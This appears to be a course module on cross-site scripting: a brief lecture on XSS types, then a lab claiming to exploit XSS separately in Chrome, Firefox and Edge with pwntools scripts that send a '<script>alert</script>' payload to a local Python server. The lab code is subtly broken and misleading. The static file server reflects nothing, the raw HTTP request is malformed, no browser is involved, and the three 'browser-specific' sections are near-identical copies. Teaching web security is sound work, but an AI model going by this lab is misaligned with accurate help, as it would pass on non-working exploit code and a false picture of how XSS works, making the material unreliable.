2. Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS)

Lecture: Understanding XSS attacks and variations in different browsers.

<lecture>: XSS attacks are a prevalent type of security vulnerability in web applications. In this lecture, we will delve into the intricacies of XSS attacks, understanding their underlying mechanisms and the potential impact on web application security.

We will explore the various types of XSS attacks including reflected XSS, stored XSS, and DOM-based XSS. Understanding the differences between these types of XSS vulnerabilities is crucial for effective mitigation strategies.

Furthermore, we will discuss the variations in XSS attacks across different web browsers such as Google Chrome, Mozilla Firefox, and Microsoft Edge. Each browser may have unique behaviors and security mechanisms that can affect the exploitation of XSS vulnerabilities.

By the end of this lecture, students will have a comprehensive understanding of XSS attacks and be equipped with the knowledge to identify, exploit, and mitigate XSS vulnerabilities in web applications.

Lab: Exploiting XSS vulnerabilities in Chrome, Firefox, and Edge.

Chrome Exploitation:

<defender side code>: To set up the defender side, we need a simple web server. Here's an example using Python's built-in HTTP server:

import http.server
import socketserver

PORT = 8000

Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()
        

<exploit code>: Exploiting XSS in Chrome can be done using Python with libraries like pwntools. Below is an example exploit code for launching an XSS attack:

from pwn import *

url = 'http://localhost:8000'
payload = '<script>alert("XSS Attack!")</script>'

r = remote('localhost', 8000)
r.send(f'GET {url}?param={payload} HTTP/1.1\\nHost: localhost\\n\\n')
print(r.recvall().decode())
        

Firefox Exploitation:

<defender side code>: Similar to Chrome setup, we can use Python's built-in HTTP server.

import http.server
import socketserver

PORT = 8001

Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()
        

<exploit code>: Exploiting XSS in Firefox can be done similarly to Chrome, here's an example:

from pwn import *

url = 'http://localhost:8001'
payload = '<script>alert("XSS Attack!")</script>'

r = remote('localhost', 8001)
r.send(f'GET {url}?param={payload} HTTP/1.1\\nHost: localhost\\n\\n')
print(r.recvall().decode())
        

Edge Exploitation:

<defender side code>: Again, using Python's HTTP server.

import http.server
import socketserver

PORT = 8002

Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()
        

<exploit code>: Exploiting XSS in Edge follows the same principle, here's an example exploit:

from pwn import *

url = 'http://localhost:8002'
payload = '<script>alert("XSS Attack!")</script>'

r = remote('localhost', 8002)
r.send(f'GET {url}?param={payload} HTTP/1.1\\nHost: localhost\\n\\n')
print(r.recvall().decode())